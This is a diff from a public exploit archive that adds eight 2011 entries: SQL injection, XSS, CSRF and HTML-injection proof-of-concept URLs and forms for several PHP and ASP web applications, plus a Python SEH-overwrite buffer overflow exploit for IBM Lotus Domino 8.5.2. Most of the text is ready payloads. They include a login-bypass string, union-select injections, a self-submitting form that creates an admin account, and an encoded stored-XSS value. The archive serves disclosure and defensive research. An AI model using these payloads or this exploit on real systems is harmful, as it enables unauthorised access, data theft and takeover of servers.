Update: 2015-02-24

8 new exploits

files.csv

@@ -32570,3 +32570,11 @@ id,file,description,date,author,platform,type,port
 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0
 36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0
+36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0
+36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow Vulnerability",2011-09-20,rmallof,windows,remote,0
+36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 'd' Parameter Cross Site Scripting Vulnerability",2011-09-21,Kurd-Team,asp,webapps,0
+36147,platforms/php/webapps/36147.txt,"Free Help Desk 1.1b Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps,0
+36148,platforms/php/webapps/36148.txt,"phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-18,iM4n,php,webapps,0
+36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection Vulnerabilities",2011-09-21,"kurdish hackers team",php,webapps,0
+36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
+36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0

platforms/asp/webapps/36146.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49712/info
+
+i-Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+i-Gallery 3.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/igallery.asp?d="><script>alert('kurd-team')</script> 

platforms/php/webapps/36144.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/49677/info
+
+Card sharj is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Card sharj 1.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?cardId=[sql inject]
+
+http://www.example.com/index.php?action=[sql inject]
+
+http://www.example.com/Card-sharj-scripts/admin/index.php
+
+Username & Password: admin' or '1=1 

platforms/php/webapps/36147.txt

@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/49721/info
+
+Free Help Desk is prone to the following input-validation vulnerabilities:
+
+1. A cross-site scripting vulnerability
+2. Multiple SQL-injection vulnerabilities
+3. A cross-site request-forgery vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Free Help Desk 1.1b is vulnerable; other versions may also be affected. 
+
+SQL injection:
+
+URIs
+
+http://www.example.com/index.php?sub=users&action=edit&user_id=-1%27%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20+--+
+http://www.example.com/index.php?sub=types&action=edit&type_id=123%27%20union%20select%201,2,version%28%29,4,5,6%20+--+
+http://www.example.com/index.php?sub=help&action=details&call_id=1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20+--+
+http://www.example.com/index.php?sub=help&call_first_name=%22%20and%201=1%20+--+
+
+Inputs:
+
+<form action="http://www.example.com/index.php" method="post">
+<input type="hidden" name="user" value="' OR 1=1 -- ">
+<input type="hidden" name="pass" value="1">
+<input name="send" value="exploit" type="submit">
+</form>
+
+
+Cross-site scripting:
+
+URIs
+
+http://www.example.com/index.php?sub=types&action=add&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=types&action=edit&type_id=15&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=types&action=add&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=types&action=edit&type_id=8&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=staff&action=add&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=staff&action=edit&type_id=7&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/index.php?sub=types&action=add&type=3&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+Cross-site request-forgery:
+
+Input:
+
+<form action="http://www.example.com/index.php?sub=users&action=store&type=add" method="post">
+<input type="hidden" name="user_id" value="">
+<input type="hidden" name="user_name" value="newadmin">
+<input type="hidden" name="user_login" value="newadmin">
+<input type="hidden" name="user_password" value="123456">
+<input type="hidden" name="user_password_confirm" value="123456">
+<input type="hidden" name="user_level" value="0">
+<input type="hidden" name="user_email" value="">
+<input type="submit" id="btn"> 
+</form>
+<script>
+document.getElementById('btn').click();
+</script>

platforms/php/webapps/36148.txt

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/49729/info
+
+phpRS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+phpRS 2.8.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
+
+http://www.example.com/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab
+
+http://www.example.com/phpRS Path/index.php?strana=%24%7binjecthere%7d
+
+http://www.example.com/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab
+
+http://www.example.com/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d 
+
+http://www.example.com/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
+
+http://www.example.com/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab
+
+http://www.example.com/phpRS Path/index.php?strana=%24%7binjecthere%7d
+
+http://www.example.com/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab 
+
+http://www.example.com/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d

platforms/php/webapps/36149.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/49733/info
+
+OneCMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OneCMS 2.6.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/boards.php?t=list&rank=[SQL insertion attacks]
+http://www.example.com/index.php?load=list&view=games&abc=[SQL insertion attacks] 

platforms/php/webapps/36150.txt

@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/49740/info
+
+Zyncro is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Note: To exploit these issues, an attacker must have the ability to create a new group and capture the packets transferred.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Zyncro 3.0.1.20 is vulnerable; other versions may also be affected. 
+
+One of the functionalities of Zyncro is the possibility of creating
+groups. The name and description of the groups are not correctly
+sanitized and it's possible to provoke some attacks.
+
+In order to do the attack, you must create a new group and capture the
+packet transferred to the server to modify it because validation is
+done in client-side (only) using javascript.
+
+The original request has three POST data parameters like:
+popup=1   &   name=dGVzdA%3D%3D   &   description=dGVzdA%3D%3D
+
+Important data are 'name' and 'description' parameters, which are
+base64 encoded. In this case, both values are 'test':
+ url_decode(dGVzdA%3D%3D)
+ b64decode(dGVzdA==)
+ test
+
+It is possible to provoke the XSS by changing those values as follows:
+"><script>alert("XSS attack")</script>
+
+Values MUST be in base64, so:
+b64encode(""><script>alert("XSS attack")</script>") =
+Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=
+
+Finally the post-data of the request would become:
+popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d
+
+Once the request has reached the server, a new group would be created
+and any time that someone sees the name/description of the group, a
+pop-up would appear, this is the easiest attack.

platforms/php/webapps/36151.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49741/info
+
+Zyncro social network is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 

platforms/windows/remote/36145.py

@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/49705/info
+
+IBM Lotus Domino is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue will allow remote attackers to execute arbitrary code with system-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial-of-service condition.
+
+Lotus Domino 8.5.2 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+
+import socket,struct,sys,os
+
+host="192.168.x.y"					#server ip here!
+cookie="1234567890abcdef"	                        #Set your Cookie credential here! Cookie = base64((usr:pwd))
+#Shellcode = Using XOR [reg],reg to crash ("like" INT3 :))
+Shellcode=chr(0x30)
+
+server=host,80
+SEH=struct.pack("<L",0x60404672)                       # POP ESI - POP EBP - RETN nnotes.dll.60404672
+nSEH=struct.pack("<L",0x4141347A)                      # INC ecx  ;NOP 
+                                                        # INC ecx  ;NOP
+ 							# JPE  slep ;Detour
+vars="__Click=0&tHPRAgentName="                         #tHPRAgentName => Vulnerable POST variable
+buf="A"*436                                             #sended buffer-nSEH-SEH
+slep="X"*46                                             #pre-shellcode to fix JPE landing
+
+#This function forges our POST request (with our Shellcode sure)
+def buildPOST(h,b,c):				
+	P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
+	P+="Host: "+h+"\r\n"
+	P+="User-Agent: oh sure\r\n"
+	P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+	P+="Accept-Language: chinnese plz\r\n"
+	P+="Accept-Encoding: gzip,deflate\r\n"
+	P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+	P+="Keep-Alive: 115\r\n"
+	P+="Connection: keep-alive\r\n"
+	P+="Referer:  http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
+	P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
+	P+="Authorization: Basic "+c+"\r\n"
+	P+="Content-Type: application/x-www-form-urlencoded\r\n"
+	P+="Content-Length: %s\r\n" % str(len(b))
+	P+="\r\n"
+	P+=b
+	return P
+
+def main():
+	if os.name=="nt":
+		os.system("cls")
+	else:
+		os.system("clear")
+	print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
+	print"\t        ->[Remote Code Execution Exploit]<-\n\n"
+	print"[+] Crafting buffer..."
+	#Creating POST content data
+	buffer=vars+buf+nSEH+SEH+slep+Shellcode
+	print"[+] Connecting to server..."
+	s=socket.socket()
+	#Trying connect to IBM Lotus Domino HTTP server
+	try:
+		s.connect(server)
+	#We goin to exit if this fails
+	except:
+		print"[-] Error connecting to remote server..."
+		sys.exit(0)
+	print"[+] Crafting POST request..."
+	#Crafting final POST
+	post=buildPOST(host,buffer,cookie)
+	print"[+] 0k, sending..."
+	#Sending Shellcode to remote server
+	s.send(post)
+	#Server is running? Some fails :S
+	try:
+		print s.recv(2048)
+		print"[x] Exploit failed!"
+	#Else we achieve remote code execution successfully
+	except:
+		print"[+] Done!" 
+	s.close()
+	print"\n[*] By @rmallof"
+
+if __name__=="__main__":
+	main()